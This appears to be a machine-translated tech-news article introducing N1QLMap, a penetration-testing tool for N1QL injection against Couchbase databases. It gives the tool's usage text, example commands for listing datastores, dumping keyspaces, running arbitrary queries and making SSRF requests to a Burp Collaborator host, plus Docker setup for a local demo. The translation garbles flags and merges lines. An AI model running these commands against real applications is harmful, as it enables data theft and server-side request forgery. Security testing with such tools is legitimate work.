Shulou(Shulou.com)05/31 Report--

This article mainly explains "how to use N1QLMap to extract data from the Couchbase database", the content of the article is simple and clear, easy to learn and understand, the following please follow the editor's ideas slowly in depth, together to study and learn "how to use N1QLMap to extract data from the Couchbase database"!

N1QLMap

N1QLMap is a powerful N1QL injection exploit tool that currently supports penetration of Couchbase databases. The tool supports data extraction and SSRF attacks through CURL. The tool is based on Python development, so it has good cross-platform characteristics.

Tool download

Researchers can use the following commands to clone the source code of the project locally:

Git clone https://github.com/FSecureLABS/N1QLMap.git tool help information usage: n1qlMap.py [- h] [- r REQUEST] [- k KEYWORD] [--proxy PROXY] [--validatecerts] [- v] (- d |-ks DATASTORE_URL |-e KEYSPACE_ID |-Q QUERY |-c [ENDPOINT [OPTIONS...]]) Host positional arguments: host Host used to send an HTTP request e.g. Https://vulndomain.net optional arguments:-h,-- help show this help message and exit-r REQUEST,-- request REQUEST Path to an HTTP request-k KEYWORD -keyword KEYWORD Keyword that exists in HTTP response when query is successful-- proxy PROXY Proxy server address-- validatecerts Set the flag to enforce certificate validation. Certificates are not validated by default!-v,-- verbose_debug Set the verbosity level to debug-d,-- datastores Lists available datastores-ks DATASTORE_URL,-- keyspaces DATASTORE_URL Lists available keyspaces for specific datastore URL-e KEYSPACE_ID,-- extract KEYSPACE_ID Extracts data from a specific keyspace-Q QUERY -- query QUERY Run arbitrary N1QL query-c [ENDPOINT [OPTIONS...]],-- curl [ENDPOINT [OPTIONS...]] Runs CURL N1QL function inside the query, using the can be used to SSRF tool

First, we need to add a HTTP request to the request.txt file, and then use * i* to make an injection point, which you can refer to by looking at the example_request_1.txt file.

Next, you need to execute the following command.

Extract data store: $. / n1qlMap.py http://localhost:3000-- request example_request_1.txt-- keyword beer-sample-- datastores extract key space from specific data store ID: $. / n1qlMap.py http://localhost:3000-- request example_request_1.txt-- keyword beer-sample-- keyspaces "http://127.0.0.1:8091" extract all documents from a given key space: $. / n1qlMap. Py http://localhost:3000-- request example_request_1.txt-- keyword beer-sample-- extract travel-sample runs any query statement: $. / n1qlMap.py http://localhost:3000-- request example_request_1.txt-- keyword beer-sample-- query 'SELECT * FROM `travel- sample` AS T ORDER by META (T). Id LIMIT 1' executes CURL request / SSRF:$. / n1qlMap.py http://localhost:3000-- request example_request_1 .txt-- keyword beer-sample-- curl * j3mrt7xy3pre.burpcollaborator.net "{'request':'POST' 'data':'data','header': [' User-Agent: Agent Smith']} "tool requirements

N1QLMap.py scripts do not require any dependent components other than the Python 3 environment.

The following components are only required by Demo, and the Demo is located in the n1ql-demo directory of the project:

Docker

Docer Compose

To install Docker and Docker Compose on Kali, run the following command:

# Docker Installationcurl-fsSL https://download.docker.com/linux/debian/gpg | apt-key add-echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' > / etc/apt/sources.list.d/docker.listapt-get update apt-get remove docker docker-engine docker.ioapt-get install docker-ce # Start Docker Servicesystemctl start docker # Docker Compose Installationsudo curl-L "https://github.com/docker/compose/releases/download/1.24.1/docker -compose-$ (uname-s)-$(uname-m) "- o / usr/local/bin/docker-composesudo chmod + x / usr/local/bin/docker-compose

Next, run the following command to test Docker:

Sample use of docker run hello-world tool-Demo

To test the tool and try to exploit N1QL injection vulnerabilities, we can test using Docker devices with Couchbase and NodeJS Web applications installed. If the above dependent components have been installed, we can directly run the following command to test:

Cd n1ql-demo./quick_setup.sh

Now we can execute N1QLMap to test for N1QL injection vulnerabilities and extract data from the Couchbase database.

Thank you for your reading, the above is the content of "how to use N1QLMap to extract data from Couchbase database". After the study of this article, I believe you have a deeper understanding of how to use N1QLMap to extract data from Couchbase database, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.